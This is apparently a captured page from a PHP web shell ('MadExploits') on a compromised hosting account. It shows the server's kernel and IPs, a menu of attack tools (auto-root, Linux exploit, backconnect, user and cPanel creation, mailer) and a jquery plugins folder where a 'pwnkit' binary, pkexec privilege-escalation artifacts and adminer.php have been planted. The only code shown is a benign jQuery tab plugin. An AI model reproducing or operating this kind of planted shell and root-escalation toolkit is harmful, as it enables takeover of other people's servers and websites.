Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
js /
jquery /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajaxfileupload
[ DIR ]
drwx---r-x
alerts
[ DIR ]
drwx---r-x
autocomplete
[ DIR ]
drwx---r-x
bxslider
[ DIR ]
drwx---r-x
chosen
[ DIR ]
drwx---r-x
cluetip
[ DIR ]
drwx---r-x
fancybox
[ DIR ]
drwx---r-x
footable
[ DIR ]
drwx---r-x
footable-sort
[ DIR ]
drwx---r-x
growl
[ DIR ]
drwx---r-x
imgareaselect
[ DIR ]
drwx---r-x
jgrowl
[ DIR ]
drwx---r-x
jqzoom
[ DIR ]
drwx---r-x
jstree
[ DIR ]
drwx---r-x
select2
[ DIR ]
drwx---r-x
smartWizard
[ DIR ]
drwx---r-x
tabpane
[ DIR ]
drwx---r-x
thickbox
[ DIR ]
drwx---r-x
timepicker
[ DIR ]
drwx---r-x
treeview-categories
[ DIR ]
drwx---r-x
validate
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
index.php
1.29
KB
-rw----r--
jquery.autosize.js
3.1
KB
-rw----r--
jquery.chosen.js
39.49
KB
-rw----r--
jquery.colorpicker.js
17.46
KB
-rw----r--
jquery.cooki-plugin.js
1.66
KB
-rw----r--
jquery.dimensions.js
2.46
KB
-rw----r--
jquery.dragtable.js
16.52
KB
-rw----r--
jquery.easing.js
4.84
KB
-rw----r--
jquery.excanvas.js
18.96
KB
-rw----r--
jquery.fieldselection.js
1.75
KB
-rw----r--
jquery.flip.js
11.5
KB
-rw----r--
jquery.flot.js
36.67
KB
-rw----r--
jquery.highlight.js
1.33
KB
-rw----r--
jquery.hoverIntent.js
1.57
KB
-rw----r--
jquery.idTabs.js
2.1
KB
-rw----r--
jquery.ifxtransfer.js
1.97
KB
-rw----r--
jquery.jqminmax.js
1.91
KB
-rw----r--
jquery.jscroll.js
14.68
KB
-rw----r--
jquery.pngFix.js
2.51
KB
-rw----r--
jquery.scrollTo.js
2.61
KB
-rw----r--
jquery.serialScroll.js
1.97
KB
-rw----r--
jquery.sortable.js
2.8
KB
-rw----r--
jquery.tablednd.js
11.83
KB
-rw----r--
jquery.tablefilter.js
1.87
KB
-rw----r--
jquery.tagify.js
3.75
KB
-rw----r--
jquery.typewatch.js
2.24
KB
-rw----r--
jquery.validate-creditcard.js
3.72
KB
-rw----r--
jquery.validate.js
20.57
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.idTabs.js
/* idTabs ~ Sean Catchpole - Version 1.0 */ /* Options (in any order): start (number|string) Index number of default tab. ex: idTabs(0) String of id of default tab. ex: idTabs("#tab1") default: class "selected" or index 0 return (boolean) True - Url will change. ex: idTabs(true) False - Url will not change. ex: idTabs(false) default: false click (function) Function will be called when a tab is clicked. ex: idTabs(foo) If the function returns true, idTabs will show/hide content (as usual). If the function returns false, idTabs will not take any action. The function is passed three variables: The id of the element to be shown an array of all id's that can be shown and the element containing the tabs MODIFIED BY PRESTASHOP */ (function($){$.fn.idTabs=function(){var s={"start":null,"return":false,"click":null};for(var i=0;i<arguments.length;++i){var n={},a=arguments[i];switch(typeof a){case"object":$.extend(n,a);break;case"number":case"string":n.start=a;break;case"boolean":n["return"]=a;break;case"function":n.click=a;break;};$.extend(s,n);} var self=this;var list=$("a[href^='#']",this).click(function(){if($("a.selected",self)[0]==this) return s["return"];var id="#"+this.href.split('#')[1];var aList=[];var idList=[];$("a",self).each(function(){if(this.href.match(/#/)){aList[aList.length]=this;idList[idList.length]="#"+this.href.split('#')[1];}});if(s.click&&!s.click(id,idList,self))return s["return"];for(i in aList)$(aList[i]).removeClass("selected");for(i in idList){$(idList[i]).addClass('block_hidden_only_for_screen');} $(this).addClass("selected");$(id).removeClass('block_hidden_only_for_screen');return s["return"];});var test;if(typeof s.start=="number"&&(test=list.filter(":eq("+s.start+")")).length) test.click();else if(typeof s.start=="string"&&(test=list.filter("[href='#"+s.start+"']")).length) test.click();else if((test=list.filter(".selected")).length) test.removeClass("selected").click();else list.filter(":first").click();return this;};$(function(){$(".idTabs").each(function(){$(this).idTabs();});});})(jQuery);
Close